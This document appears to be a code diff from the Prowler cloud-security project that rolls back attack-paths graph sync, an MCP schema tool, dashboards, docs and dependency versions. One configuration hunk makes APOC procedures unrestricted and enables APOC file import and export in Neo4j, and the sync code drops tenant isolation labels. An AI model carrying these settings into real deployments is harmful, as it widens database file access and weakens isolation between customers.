-    MATCH (s:{PROVIDER_RESOURCE_LABEL} {{{PROVIDER_ELEMENT_ID_PROPERTY}: row.start_element_id}})
-    MATCH (t:{PROVIDER_RESOURCE_LABEL} {{{PROVIDER_ELEMENT_ID_PROPERTY}: row.end_element_id}})
-    MERGE (s)-[r:__REL_TYPE__ {{{PROVIDER_ELEMENT_ID_PROPERTY}: row.provider_element_id}}]->(t)
+    MATCH (s:{PROVIDER_RESOURCE_LABEL} {{_provider_element_id: row.start_element_id}})
+    MATCH (t:{PROVIDER_RESOURCE_LABEL} {{_provider_element_id: row.end_element_id}})
+    MERGE (s)-[r:__REL_TYPE__ {{_provider_element_id: row.provider_element_id}}]->(t)
    SET r += row.props
-    SET r.{PROVIDER_ID_PROPERTY} = $provider_id
-"""
+    SET r._provider_id = $provider_id
+    SET r.provider_element_id = row.provider_element_id
+    SET r.provider_id = $provider_id
+"""  # The last two lines are deprecated properties
@@ -55,6 +55,7 @@ exception propagates to Celery.

 import logging
 import time
+
 from typing import Any

 from cartography.config import Config as CartographyConfig
@@ -62,14 +63,16 @@ from cartography.intel import analysis as cartography_analysis
 from cartography.intel import create_indexes as cartography_create_indexes
 from cartography.intel import ontology as cartography_ontology
 from celery.utils.log import get_task_logger
-from tasks.jobs.attack_paths import db_utils, findings, internet, sync, utils
-from tasks.jobs.attack_paths.config import get_cartography_ingestion_function

 from api.attack_paths import database as graph_database
 from api.db_utils import rls_transaction
-from api.models import Provider as ProwlerAPIProvider
-from api.models import StateChoices
+from api.models import (
+    Provider as ProwlerAPIProvider,
+    StateChoices,
+)
 from api.utils import initialize_prowler_provider
+from tasks.jobs.attack_paths import db_utils, findings, internet, sync, utils
+from tasks.jobs.attack_paths.config import get_cartography_ingestion_function

 # Without this Celery goes crazy with Cartography logging
 logging.getLogger("cartography").setLevel(logging.ERROR)
@@ -144,10 +147,6 @@ def run(tenant_id: str, scan_id: str, task_id: str) -> dict[str, Any]:
        attack_paths_scan, task_id, tenant_cartography_config
    )

-    subgraph_dropped = False
-    sync_completed = False
-    provider_gated = False
-
    try:
        logger.info(
            f"Creating Neo4j database {tmp_cartography_config.neo4j_database} for tenant {prowler_api_provider.tenant_id}"
@@ -226,12 +225,10 @@ def run(tenant_id: str, scan_id: str, task_id: str) -> dict[str, Any]:

        logger.info(f"Deleting existing provider graph in {tenant_database_name}")
        db_utils.set_provider_graph_data_ready(attack_paths_scan, False)
-        provider_gated = True
        graph_database.drop_subgraph(
            database=tenant_database_name,
            provider_id=str(prowler_api_provider.id),
        )
-        subgraph_dropped = True
        db_utils.update_attack_paths_scan_progress(attack_paths_scan, 98)

        logger.info(
@@ -240,10 +237,8 @@ def run(tenant_id: str, scan_id: str, task_id: str) -> dict[str, Any]:
        sync.sync_graph(
            source_database=tmp_database_name,
            target_database=tenant_database_name,
-            tenant_id=str(prowler_api_provider.tenant_id),
            provider_id=str(prowler_api_provider.id),
        )
-        sync_completed = True
        db_utils.set_graph_data_ready(attack_paths_scan, True)
        db_utils.update_attack_paths_scan_progress(attack_paths_scan, 99)

@@ -268,39 +263,23 @@ def run(tenant_id: str, scan_id: str, task_id: str) -> dict[str, Any]:
        logger.exception(exception_message)
        ingestion_exceptions["global_error"] = exception_message

-        # Recover graph_data_ready based on how far the swap got.
-        # Partial drop (mid-batch failure) may leave `subgraph_dropped=False`
-        # with data partially deleted, so we prefer that over permanently blocked queries.
-        try:
-            if sync_completed:
-                db_utils.set_graph_data_ready(attack_paths_scan, True)
-            elif provider_gated and not subgraph_dropped:
-                db_utils.set_provider_graph_data_ready(attack_paths_scan, True)
-
-        except Exception:
-            logger.error(
-                f"Failed to recover `graph_data_ready` for provider {attack_paths_scan.provider_id}",
-                exc_info=True,
-            )
-
-        # Dropping the temporary database if it still exists
+        # Handling databases changes
        try:
            graph_database.drop_database(tmp_cartography_config.neo4j_database)

        except Exception as e:
            logger.error(
-                f"Failed to drop temporary Neo4j database `{tmp_cartography_config.neo4j_database}` during cleanup: {e}",
+                f"Failed to drop temporary Neo4j database {tmp_cartography_config.neo4j_database} during cleanup: {e}",
                exc_info=True,
            )

-        # Set Attack Paths scan state to FAILED
        try:
            db_utils.finish_attack_paths_scan(
                attack_paths_scan, StateChoices.FAILED, ingestion_exceptions
            )
        except Exception as e:
            logger.error(
-                f"Could not mark Attack Paths scan {attack_paths_scan.id} as `FAILED` (row may have been deleted): {e}",
+                f"Could not mark attack paths scan {attack_paths_scan.id} as FAILED (row may have been deleted): {e}",
                exc_info=True,
            )

@@ -8,16 +8,14 @@ to the tenant database, adding provider isolation labels and properties.
 from collections import defaultdict
 from typing import Any

-import neo4j
 from celery.utils.log import get_task_logger

 from api.attack_paths import database as graph_database
 from tasks.jobs.attack_paths.config import (
+    BATCH_SIZE,
+    DEPRECATED_PROVIDER_RESOURCE_LABEL,
    PROVIDER_ISOLATION_PROPERTIES,
    PROVIDER_RESOURCE_LABEL,
-    SYNC_BATCH_SIZE,
-    get_provider_label,
-    get_tenant_label,
 )
 from tasks.jobs.attack_paths.indexes import IndexType, create_indexes
 from tasks.jobs.attack_paths.queries import (
@@ -39,7 +37,6 @@ def create_sync_indexes(neo4j_session) -> None:
 def sync_graph(
    source_database: str,
    target_database: str,
-    tenant_id: str,
    provider_id: str,
 ) -> dict[str, int]:
    """
@@ -48,7 +45,6 @@ def sync_graph(
    Args:
        `source_database`: The temporary scan database
        `target_database`: The tenant database
-        `tenant_id`: The tenant ID for isolation
        `provider_id`: The provider ID for isolation

    Returns:
@@ -57,7 +53,6 @@ def sync_graph(
    nodes_synced = sync_nodes(
        source_database,
        target_database,
-        tenant_id,
        provider_id,
    )
    relationships_synced = sync_relationships(
@@ -75,45 +70,50 @@ def sync_graph(
 def sync_nodes(
    source_database: str,
    target_database: str,
-    tenant_id: str,
    provider_id: str,
 ) -> int:
    """
    Sync nodes from source to target database.

    Adds `_ProviderResource` label and `_provider_id` property to all nodes.
-    Also adds dynamic `_Tenant_{id}` and `_Provider_{id}` isolation labels.
-
-    Source and target sessions are opened sequentially per batch to avoid
-    holding two Bolt connections simultaneously for the entire sync duration.
    """
    last_id = -1
    total_synced = 0

-    while True:
-        grouped: dict[tuple[str, ...], list[dict[str, Any]]] = defaultdict(list)
-        batch_count = 0
-
-        with graph_database.get_session(source_database) as source_session:
-            result = source_session.run(
-                NODE_FETCH_QUERY,
-                {"last_id": last_id, "batch_size": SYNC_BATCH_SIZE},
+    with (
+        graph_database.get_session(source_database) as source_session,
+        graph_database.get_session(target_database) as target_session,
+    ):
+        while True:
+            rows = list(
+                source_session.run(
+                    NODE_FETCH_QUERY,
+                    {"last_id": last_id, "batch_size": BATCH_SIZE},
+                )
            )
-            for record in result:
-                batch_count += 1
-                last_id = record["internal_id"]
-                key, value = _node_to_sync_dict(record, provider_id)
-                grouped[key].append(value)

-        if batch_count == 0:
-            break
+            if not rows:
+                break
+
+            last_id = rows[-1]["internal_id"]
+
+            grouped: dict[tuple[str, ...], list[dict[str, Any]]] = defaultdict(list)
+            for row in rows:
+                labels = tuple(sorted(set(row["labels"] or [])))
+                props = dict(row["props"] or {})
+                _strip_internal_properties(props)
+                provider_element_id = f"{provider_id}:{row['element_id']}"
+                grouped[labels].append(
+                    {
+                        "provider_element_id": provider_element_id,
+                        "props": props,
+                    }
+                )

-        with graph_database.get_session(target_database) as target_session:
            for labels, batch in grouped.items():
                label_set = set(labels)
                label_set.add(PROVIDER_RESOURCE_LABEL)
-                label_set.add(get_tenant_label(tenant_id))
-                label_set.add(get_provider_label(provider_id))
+                label_set.add(DEPRECATED_PROVIDER_RESOURCE_LABEL)
                node_labels = ":".join(f"`{label}`" for label in sorted(label_set))

                query = render_cypher_template(
@@ -127,10 +127,10 @@ def sync_nodes(
                    },
                )

-        total_synced += batch_count
-        logger.info(
-            f"Synced {total_synced} nodes from {source_database} to {target_database}"
-        )
+            total_synced += len(rows)
+            logger.info(
+                f"Synced {total_synced} nodes from {source_database} to {target_database}"
+            )

    return total_synced

@@ -144,32 +144,41 @@ def sync_relationships(
    Sync relationships from source to target database.

    Adds `_provider_id` property to all relationships.
-
-    Source and target sessions are opened sequentially per batch to avoid
-    holding two Bolt connections simultaneously for the entire sync duration.
    """
    last_id = -1
    total_synced = 0

-    while True:
-        grouped: dict[str, list[dict[str, Any]]] = defaultdict(list)
-        batch_count = 0
-
-        with graph_database.get_session(source_database) as source_session:
-            result = source_session.run(
-                RELATIONSHIPS_FETCH_QUERY,
-                {"last_id": last_id, "batch_size": SYNC_BATCH_SIZE},
+    with (
+        graph_database.get_session(source_database) as source_session,
+        graph_database.get_session(target_database) as target_session,
+    ):
+        while True:
+            rows = list(
+                source_session.run(
+                    RELATIONSHIPS_FETCH_QUERY,
+                    {"last_id": last_id, "batch_size": BATCH_SIZE},
+                )
            )
-            for record in result:
-                batch_count += 1
-                last_id = record["internal_id"]
-                key, value = _rel_to_sync_dict(record, provider_id)
-                grouped[key].append(value)

-        if batch_count == 0:
-            break
+            if not rows:
+                break
+
+            last_id = rows[-1]["internal_id"]
+
+            grouped: dict[str, list[dict[str, Any]]] = defaultdict(list)
+            for row in rows:
+                props = dict(row["props"] or {})
+                _strip_internal_properties(props)
+                rel_type = row["rel_type"]
+                grouped[rel_type].append(
+                    {
+                        "start_element_id": f"{provider_id}:{row['start_element_id']}",
+                        "end_element_id": f"{provider_id}:{row['end_element_id']}",
+                        "provider_element_id": f"{provider_id}:{rel_type}:{row['internal_id']}",
+                        "props": props,
+                    }
+                )

-        with graph_database.get_session(target_database) as target_session:
            for rel_type, batch in grouped.items():
                query = render_cypher_template(
                    RELATIONSHIP_SYNC_TEMPLATE, {"__REL_TYPE__": rel_type}
@@ -182,42 +191,14 @@ def sync_relationships(
                    },
                )

-        total_synced += batch_count
-        logger.info(
-            f"Synced {total_synced} relationships from {source_database} to {target_database}"
-        )
+            total_synced += len(rows)
+            logger.info(
+                f"Synced {total_synced} relationships from {source_database} to {target_database}"
+            )

    return total_synced


-def _node_to_sync_dict(
-    record: neo4j.Record, provider_id: str
-) -> tuple[tuple[str, ...], dict[str, Any]]:
-    """Transform a source node record into a (grouping_key, sync_dict) pair."""
-    props = dict(record["props"] or {})
-    _strip_internal_properties(props)
-    labels = tuple(sorted(set(record["labels"] or [])))
-    return labels, {
-        "provider_element_id": f"{provider_id}:{record['element_id']}",
-        "props": props,
-    }
-
-
-def _rel_to_sync_dict(
-    record: neo4j.Record, provider_id: str
-) -> tuple[str, dict[str, Any]]:
-    """Transform a source relationship record into a (grouping_key, sync_dict) pair."""
-    props = dict(record["props"] or {})
-    _strip_internal_properties(props)
-    rel_type = record["rel_type"]
-    return rel_type, {
-        "start_element_id": f"{provider_id}:{record['start_element_id']}",
-        "end_element_id": f"{provider_id}:{record['end_element_id']}",
-        "provider_element_id": f"{provider_id}:{rel_type}:{record['internal_id']}",
-        "props": props,
-    }
-
-
 def _strip_internal_properties(props: dict[str, Any]) -> None:
    """Remove provider isolation properties before the += spread in sync templates."""
    for key in PROVIDER_ISOLATION_PROPERTIES:
@@ -4,7 +4,7 @@ from django.db.models import Count, Q

 from api.db_router import READ_REPLICA_ALIAS
 from api.db_utils import rls_transaction
-from api.models import Finding, Scan, StatusChoices
+from api.models import Finding, StatusChoices
 from prowler.lib.outputs.finding import Finding as FindingOutput

 logger = get_task_logger(__name__)
@@ -35,26 +35,25 @@ def _aggregate_requirement_statistics_from_database(
        }
    """
    requirement_statistics_by_check_id = {}
-    # TODO: review when finding-resource relation changes from 1:1
+    # TODO: take into account that now the relation is 1 finding == 1 resource, review this when the logic changes
    with rls_transaction(tenant_id, using=READ_REPLICA_ALIAS):
-        # Pre-check: skip if the scan's provider is deleted (avoids JOINs in the main query)
-        if Scan.all_objects.filter(id=scan_id, provider__is_deleted=True).exists():
-            return requirement_statistics_by_check_id
-
        aggregated_statistics_queryset = (
            Finding.all_objects.filter(
                tenant_id=tenant_id,
                scan_id=scan_id,
                muted=False,
+                resources__provider__is_deleted=False,
            )
            .values("check_id")
            .annotate(
                total_findings=Count(
                    "id",
+                    distinct=True,
                    filter=Q(status__in=[StatusChoices.PASS, StatusChoices.FAIL]),
                ),
                passed_findings=Count(
                    "id",
+                    distinct=True,
                    filter=Q(status=StatusChoices.PASS),
                ),
            )
@@ -169,27 +169,35 @@ class TestAggregateRequirementStatistics:
        assert result["check_1"]["passed"] == 1
        assert result["check_1"]["total"] == 1

-    def test_skips_aggregation_for_deleted_provider(
-        self, tenants_fixture, scans_fixture
-    ):
-        """Verify aggregation returns empty when the scan's provider is soft-deleted."""
+    def test_excludes_findings_without_resources(self, tenants_fixture, scans_fixture):
+        """Verify findings without resources are excluded from aggregation."""
        tenant = tenants_fixture[0]
        scan = scans_fixture[0]

+        # Finding WITH resource → should be counted
        self._create_finding_with_resource(
            tenant, scan, "finding-1", "check_1", StatusChoices.PASS
        )

-        # Soft-delete the provider
-        provider = scan.provider
-        provider.is_deleted = True
-        provider.save(update_fields=["is_deleted"])
+        # Finding WITHOUT resource → should be EXCLUDED
+        Finding.objects.create(
+            tenant_id=tenant.id,
+            scan=scan,
+            uid="finding-2",
+            check_id="check_1",
+            status=StatusChoices.FAIL,
+            severity=Severity.high,
+            impact=Severity.high,
+            check_metadata={},
+            raw_result={},
+        )

        result = _aggregate_requirement_statistics_from_database(
            str(tenant.id), str(scan.id)
        )

-        assert result == {}
+        assert result["check_1"]["passed"] == 1
+        assert result["check_1"]["total"] == 1

    def test_multiple_resources_no_double_count(self, tenants_fixture, scans_fixture):
        """Verify a finding with multiple resources is only counted once."""
@@ -558,9 +558,9 @@ neo4j:
  # Neo4j Configuration (yaml format)
  config:
    dbms_security_procedures_allowlist: "apoc.*"
-    dbms_security_procedures_unrestricted: ""
+    dbms_security_procedures_unrestricted: "apoc.*"

  apoc_config:
-    apoc.export.file.enabled: "false"
-    apoc.import.file.enabled: "false"
+    apoc.export.file.enabled: "true"
+    apoc.import.file.enabled: "true"
    apoc.import.file.use_neo4j_config: "true"
@@ -1,20 +0,0 @@
-import warnings
-
-from dashboard.common_methods import get_section_containers_rbi
-
-warnings.filterwarnings("ignore")
-
-
-def get_table(data):
-    aux = data[
-        [
-            "REQUIREMENTS_ID",
-            "REQUIREMENTS_DESCRIPTION",
-            "CHECKID",
-            "STATUS",
-            "REGION",
-            "ACCOUNTID",
-            "RESOURCEID",
-        ]
-    ]
-    return get_section_containers_rbi(aux, "REQUIREMENTS_ID")
@@ -1,20 +0,0 @@
-import warnings
-
-from dashboard.common_methods import get_section_containers_rbi
-
-warnings.filterwarnings("ignore")
-
-
-def get_table(data):
-    aux = data[
-        [
-            "REQUIREMENTS_ID",
-            "REQUIREMENTS_DESCRIPTION",
-            "CHECKID",
-            "STATUS",
-            "REGION",
-            "ACCOUNTID",
-            "RESOURCEID",
-        ]
-    ]
-    return get_section_containers_rbi(aux, "REQUIREMENTS_ID")
@@ -1,24 +0,0 @@
-import warnings
-
-from dashboard.common_methods import get_section_containers_format3
-
-warnings.filterwarnings("ignore")
-
-
-def get_table(data):
-    aux = data[
-        [
-            "REQUIREMENTS_ID",
-            "REQUIREMENTS_DESCRIPTION",
-            "REQUIREMENTS_ATTRIBUTES_SECTION",
-            "CHECKID",
-            "STATUS",
-            "REGION",
-            "ACCOUNTID",
-            "RESOURCEID",
-        ]
-    ].copy()
-
-    return get_section_containers_format3(
-        aux, "REQUIREMENTS_ATTRIBUTES_SECTION", "REQUIREMENTS_ID"
-    )
@@ -1,24 +0,0 @@
-import warnings
-
-from dashboard.common_methods import get_section_containers_format3
-
-warnings.filterwarnings("ignore")
-
-
-def get_table(data):
-    aux = data[
-        [
-            "REQUIREMENTS_ID",
-            "REQUIREMENTS_DESCRIPTION",
-            "REQUIREMENTS_ATTRIBUTES_SECTION",
-            "CHECKID",
-            "STATUS",
-            "REGION",
-            "ACCOUNTID",
-            "RESOURCEID",
-        ]
-    ].copy()
-
-    return get_section_containers_format3(
-        aux, "REQUIREMENTS_ATTRIBUTES_SECTION", "REQUIREMENTS_ID"
-    )
@@ -1,24 +0,0 @@
-import warnings
-
-from dashboard.common_methods import get_section_containers_format3
-
-warnings.filterwarnings("ignore")
-
-
-def get_table(data):
-    aux = data[
-        [
-            "REQUIREMENTS_ID",
-            "REQUIREMENTS_DESCRIPTION",
-            "REQUIREMENTS_ATTRIBUTES_SECTION",
-            "CHECKID",
-            "STATUS",
-            "REGION",
-            "ACCOUNTID",
-            "RESOURCEID",
-        ]
-    ].copy()
-
-    return get_section_containers_format3(
-        aux, "REQUIREMENTS_ATTRIBUTES_SECTION", "REQUIREMENTS_ID"
-    )
@@ -1,24 +0,0 @@
-import warnings
-
-from dashboard.common_methods import get_section_containers_format3
-
-warnings.filterwarnings("ignore")
-
-
-def get_table(data):
-    aux = data[
-        [
-            "REQUIREMENTS_ID",
-            "REQUIREMENTS_DESCRIPTION",
-            "REQUIREMENTS_ATTRIBUTES_SECTION",
-            "CHECKID",
-            "STATUS",
-            "REGION",
-            "ACCOUNTID",
-            "RESOURCEID",
-        ]
-    ].copy()
-
-    return get_section_containers_format3(
-        aux, "REQUIREMENTS_ATTRIBUTES_SECTION", "REQUIREMENTS_ID"
-    )
@@ -80,8 +80,6 @@ def load_csv_files(csv_files):
                result = result.replace("_M65", " - M65")
            if "ALIBABACLOUD" in result:
                result = result.replace("_ALIBABACLOUD", " - ALIBABACLOUD")
-            if "ORACLECLOUD" in result:
-                result = result.replace("_ORACLECLOUD", " - ORACLECLOUD")
            results.append(result)

    unique_results = set(results)
@@ -211,7 +211,7 @@ Also is important to keep all code examples as short as possible, including the
 | email-security          | Ensures detection and protection against phishing, spam, spoofing, etc.                                                                                                                            |
 | forensics-ready         | Ensures systems are instrumented to support post-incident investigations. Any digital trace or evidence (logs, volume snapshots, memory dumps, network captures, etc.) preserved immutably and accompanied by integrity guarantees, which can be used in a forensic analysis |
 | software-supply-chain   | Detects or prevents tampering, unauthorized packages, or third-party risks in software supply chain                                                                                               |
-| e3                      | M365 and Azure Entra checks enabled by or dependent on an E3 license (e.g., baseline security policies, conditional access)                                                                            |
-| e5                      | M365 and Azure Entra checks enabled by or dependent on an E5 license (e.g., advanced threat protection, audit, DLP, and eDiscovery)                                                                    |
+| e3                      | M365-specific controls enabled by or dependent on an E3 license (e.g., baseline security policies, conditional access)                                                                            |
+| e5                      | M365-specific controls enabled by or dependent on an E5 license (e.g., advanced threat protection, audit, DLP, and eDiscovery)                                                                    |
 | privilege-escalation    | Detects IAM policies or permissions that allow identities to elevate their privileges beyond their intended scope, potentially gaining administrator or higher-level access through specific action combinations |
-| ec2-imdsv1              | Identifies EC2 instances using Instance Metadata Service version 1 (IMDSv1), which is vulnerable to SSRF attacks and should be replaced with IMDSv2 for enhanced security                        |
+| ec2-imdsv1              | Identifies EC2 instances using Instance Metadata Service version 1 (IMDSv1), which is vulnerable to SSRF attacks and should be replaced with IMDSv2 for enhanced security                        |
@@ -121,8 +121,8 @@ To update the environment file:
 Edit the `.env` file and change version values:

 ```env
-PROWLER_UI_VERSION="5.21.0"
-PROWLER_API_VERSION="5.21.0"
+PROWLER_UI_VERSION="5.19.0"
+PROWLER_API_VERSION="5.19.0"
 ```

 <Note>
@@ -2,12 +2,6 @@

 All notable changes to the **Prowler MCP Server** are documented in this file.

-## [0.5.0] (Prowler v5.21.0)
-
-### 🚀 Added
-
- Attack Path tool to get Neo4j DB schema [(#10321)](https://github.com/prowler-cloud/prowler/pull/10321)
-
 ## [0.4.0] (Prowler v5.19.0)

 ### 🚀 Added
@@ -5,7 +5,7 @@ This package provides MCP tools for accessing:
 - Prowler Hub: All security artifacts (detections, remediations and frameworks) supported by Prowler
 """

-__version__ = "0.5.0"
+__version__ = "0.4.0"
 __author__ = "Prowler Team"
 __email__ = "engineering@prowler.com"

@@ -118,51 +118,6 @@ class AttackPathScansListResponse(BaseModel):
            )


-class AttackPathCartographySchema(MinimalSerializerMixin, BaseModel):
-    """Cartography graph schema metadata for a completed attack paths scan.
-
-    Contains the schema URL and provider info needed to fetch the full
-    Cartography schema markdown for openCypher query generation.
-    """
-
-    model_config = ConfigDict(frozen=True)
-
-    id: str = Field(description="Unique identifier for the schema resource")
-    provider: str = Field(description="Cloud provider type (aws, azure, gcp, etc.)")
-    cartography_version: str = Field(description="Version of the Cartography schema")
-    schema_url: str = Field(description="URL to the Cartography schema page on GitHub")
-    raw_schema_url: str = Field(
-        description="Raw URL to fetch the Cartography schema markdown content"
-    )
-    schema_content: str | None = Field(
-        default=None,
-        description="Full Cartography schema markdown content (populated after fetch)",
-    )
-
-    @classmethod
-    def from_api_response(
-        cls, response: dict[str, Any]
-    ) -> "AttackPathCartographySchema":
-        """Transform JSON:API schema response to model.
-
-        Args:
-            response: Full API response with data and attributes
-
-        Returns:
-            AttackPathCartographySchema instance
-        """
-        data = response.get("data", {})
-        attributes = data.get("attributes", {})
-
-        return cls(
-            id=data["id"],
-            provider=attributes["provider"],
-            cartography_version=attributes["cartography_version"],
-            schema_url=attributes["schema_url"],
-            raw_schema_url=attributes["raw_schema_url"],
-        )
-
-
 class AttackPathQueryParameter(MinimalSerializerMixin, BaseModel):
    """Parameter definition for an attack paths query.

@@ -8,7 +8,6 @@ through cloud infrastructure relationships.
 from typing import Any, Literal

 from prowler_mcp_server.prowler_app.models.attack_paths import (
-    AttackPathCartographySchema,
    AttackPathQuery,
    AttackPathQueryResult,
    AttackPathScansListResponse,
@@ -226,53 +225,3 @@ class AttackPathsTools(BaseTool):
                f"Failed to run attack paths query '{query_id}' on scan {scan_id}: {e}"
            )
            return {"error": f"Failed to run attack paths query '{query_id}': {str(e)}"}
-
-    async def get_attack_paths_cartography_schema(
-        self,
-        scan_id: str = Field(
-            description="UUID of a COMPLETED attack paths scan. Use `prowler_app_list_attack_paths_scans` with state=['completed'] to find scan IDs"
-        ),
-    ) -> dict[str, Any]:
-        """Retrieve the Cartography graph schema for a completed attack paths scan.
-
-        This tool fetches the full Cartography schema (node labels, relationships,
-        and properties) so the LLM can write accurate custom openCypher queries
-        for attack paths analysis.
-
-        Two-step flow:
-        1. Calls the Prowler API to get schema metadata (provider, version, URLs)
-        2. Fetches the raw Cartography schema markdown from GitHub
-
-        Returns:
-        - id: Schema resource identifier
-        - provider: Cloud provider type
-        - cartography_version: Schema version
-        - schema_url: GitHub page URL for reference
-        - raw_schema_url: Raw markdown URL
-        - schema_content: Full Cartography schema markdown with node/relationship definitions
-
-        Workflow:
-        1. Use prowler_app_list_attack_paths_scans to find a completed scan
-        2. Use this tool to get the schema for the scan's provider
-        3. Use the schema to craft custom openCypher queries
-        4. Execute queries with prowler_app_run_attack_paths_query
-        """
-        try:
-            api_response = await self.api_client.get(
-                f"/attack-paths-scans/{scan_id}/schema"
-            )
-
-            schema = AttackPathCartographySchema.from_api_response(api_response)
-
-            schema_content = await self.api_client.fetch_external_url(
-                schema.raw_schema_url
-            )
-
-            return schema.model_copy(
-                update={"schema_content": schema_content}
-            ).model_dump()
-        except Exception as e:
-            self.logger.error(
-                f"Failed to get cartography schema for scan {scan_id}: {e}"
-            )
-            return {"error": f"Failed to get cartography schema: {str(e)}"}
@@ -4,15 +4,11 @@ import asyncio
 from datetime import datetime, timedelta
 from enum import Enum
 from typing import Any, Dict
-from urllib.parse import urlparse

 import httpx
-from prowler_mcp_server import __version__
 from prowler_mcp_server.lib.logger import logger
 from prowler_mcp_server.prowler_app.utils.auth import ProwlerAppAuth

-ALLOWED_EXTERNAL_DOMAINS: frozenset[str] = frozenset({"raw.githubusercontent.com"})
-

 class HTTPMethod(str, Enum):
    """HTTP methods enum."""
@@ -191,47 +187,6 @@ class ProwlerAPIClient(metaclass=SingletonMeta):
        """
        return await self._make_request(HTTPMethod.DELETE, path, params=params)

-    async def fetch_external_url(self, url: str) -> str:
-        """Fetch content from an allowed external URL (unauthenticated).
-
-        Uses the existing singleton httpx client with a domain allowlist
-        to prevent SSRF attacks.
-
-        Args:
-            url: The external URL to fetch content from
-
-        Returns:
-            Raw text content from the URL
-
-        Raises:
-            ValueError: If the URL domain is not in the allowlist
-            Exception: If the HTTP request fails
-        """
-        parsed = urlparse(url)
-        if parsed.scheme != "https":
-            raise ValueError(f"Only HTTPS URLs are allowed, got '{parsed.scheme}'")
-        if parsed.hostname not in ALLOWED_EXTERNAL_DOMAINS:
-            raise ValueError(
-                f"Domain '{parsed.hostname}' is not allowed. "
-                f"Allowed domains: {', '.join(sorted(ALLOWED_EXTERNAL_DOMAINS))}"
-            )
-
-        try:
-            response = await self.client.get(
-                url,
-                headers={"User-Agent": f"prowler-mcp-server/{__version__}"},
-            )
-            response.raise_for_status()
-            return response.text
-        except httpx.HTTPStatusError as e:
-            logger.error(f"HTTP error fetching external URL {url}: {e}")
-            raise Exception(
-                f"Failed to fetch external URL: {e.response.status_code}"
-            ) from e
-        except Exception as e:
-            logger.error(f"Error fetching external URL {url}: {e}")
-            raise
-
    async def poll_task_until_complete(
        self,
        task_id: str,
@@ -11,7 +11,7 @@ description = "MCP server for Prowler ecosystem"
 name = "prowler-mcp"
 readme = "README.md"
 requires-python = ">=3.12"
-version = "0.5.0"
+version = "0.4.0"

 [project.scripts]
 prowler-mcp = "prowler_mcp_server.main:main"
@@ -717,7 +717,7 @@ wheels = [

 [[package]]
 name = "prowler-mcp"
-version = "0.5.0"
+version = "0.3.0"
 source = { editable = "." }
 dependencies = [
    { name = "fastmcp" },
@@ -1,4 +1,4 @@
-# This file is automatically @generated by Poetry 2.1.2 and should not be changed by hand.
+# This file is automatically @generated by Poetry 2.3.0 and should not be changed by hand.

 [[package]]
 name = "about-time"
@@ -1908,6 +1908,7 @@ files = [
    {file = "colorama-0.4.6-py2.py3-none-any.whl", hash = "sha256:4f1d9991f5acc0ca119f9d443620b77f9d6b33703e51011c16baf57afb285fc6"},
    {file = "colorama-0.4.6.tar.gz", hash = "sha256:08695f5cb7ed6e0531a20572697297273c47b8cae5a63ffc6d6ed5c201be6e44"},
 ]
+markers = {dev = "platform_system == \"Windows\" or sys_platform == \"win32\""}

 [[package]]
 name = "contextlib2"
@@ -2151,6 +2152,24 @@ files = [
    {file = "defusedxml-0.7.1.tar.gz", hash = "sha256:1bb3032db185915b62d7c6209c5a8792be6a32ab2fedacc84e01b52c51aa3e69"},
 ]

+[[package]]
+name = "deprecated"
+version = "1.2.18"
+description = "Python @deprecated decorator to deprecate old python classes, functions or methods."
+optional = false
+python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,>=2.7"
+groups = ["main"]
+files = [
+    {file = "Deprecated-1.2.18-py2.py3-none-any.whl", hash = "sha256:bd5011788200372a32418f888e326a09ff80d0214bd961147cfed01b5c018eec"},
+    {file = "deprecated-1.2.18.tar.gz", hash = "sha256:422b6f6d859da6f2ef57857761bfb392480502a64c3028ca9bbe86085d72115d"},
+]
+
+[package.dependencies]
+wrapt = ">=1.10,<2"
+
+[package.extras]
+dev = ["PyTest", "PyTest-Cov", "bump2version (<1)", "setuptools ; python_version >= \"3.12\"", "tox"]
+
 [[package]]
 name = "detect-secrets"
 version = "1.5.0"
@@ -3137,7 +3156,7 @@ files = [

 [package.dependencies]
 attrs = ">=22.2.0"
-jsonschema-specifications = ">=2023.03.6"
+jsonschema-specifications = ">=2023.3.6"
 referencing = ">=0.28.4"
 rpds-py = ">=0.7.1"

@@ -3246,7 +3265,7 @@ files = [
 ]

 [package.dependencies]
-certifi = ">=14.05.14"
+certifi = ">=14.5.14"
 durationpy = ">=0.7"
 google-auth = ">=1.0.1"
 oauthlib = ">=3.2.2"
@@ -4856,7 +4875,7 @@ description = "C parser in Python"
 optional = false
 python-versions = ">=3.8"
 groups = ["main", "dev"]
-markers = "implementation_name != \"PyPy\" and platform_python_implementation != \"PyPy\""
+markers = "platform_python_implementation != \"PyPy\" and implementation_name != \"PyPy\""
 files = [
    {file = "pycparser-2.22-py3-none-any.whl", hash = "sha256:c3702b6d3dd8c7abc1afa565d7e63d53a1d0bd86cdc24edd75470f4de499cfcc"},
    {file = "pycparser-2.22.tar.gz", hash = "sha256:491c8be9c040f5390f5bf44a5b07752bd07f56edf992381b05c701439eec10f6"},
@@ -5032,21 +5051,22 @@ files = [

 [[package]]
 name = "pygithub"
-version = "2.8.0"
+version = "2.5.0"
 description = "Use the full Github API v3"
 optional = false
 python-versions = ">=3.8"
 groups = ["main"]
 files = [
-    {file = "pygithub-2.8.0-py3-none-any.whl", hash = "sha256:11a3473c1c2f1c39c525d0ee8c559f369c6d46c272cb7321c9b0cabc7aa1ce7d"},
-    {file = "pygithub-2.8.0.tar.gz", hash = "sha256:72f5f2677d86bc3a8843aa720c6ce4c1c42fb7500243b136e3d5e14ddb5c3386"},
+    {file = "PyGithub-2.5.0-py3-none-any.whl", hash = "sha256:b0b635999a658ab8e08720bdd3318893ff20e2275f6446fcf35bf3f44f2c0fd2"},
+    {file = "pygithub-2.5.0.tar.gz", hash = "sha256:e1613ac508a9be710920d26eb18b1905ebd9926aa49398e88151c1b526aad3cf"},
 ]

 [package.dependencies]
+Deprecated = "*"
 pyjwt = {version = ">=2.4.0", extras = ["crypto"]}
 pynacl = ">=1.4.0"
 requests = ">=2.14.0"
-typing-extensions = ">=4.5.0"
+typing-extensions = ">=4.0.0"
 urllib3 = ">=1.26.0"

 [[package]]
@@ -5098,7 +5118,7 @@ files = [
 ]

 [package.dependencies]
-astroid = ">=3.3.8,<=3.4.0-dev0"
+astroid = ">=3.3.8,<=3.4.0.dev0"
 colorama = {version = ">=0.4.5", markers = "sys_platform == \"win32\""}
 dill = [
    {version = ">=0.2", markers = "python_version < \"3.11\""},
@@ -5945,10 +5965,10 @@ files = [
 ]

 [package.dependencies]
-botocore = ">=1.37.4,<2.0a.0"
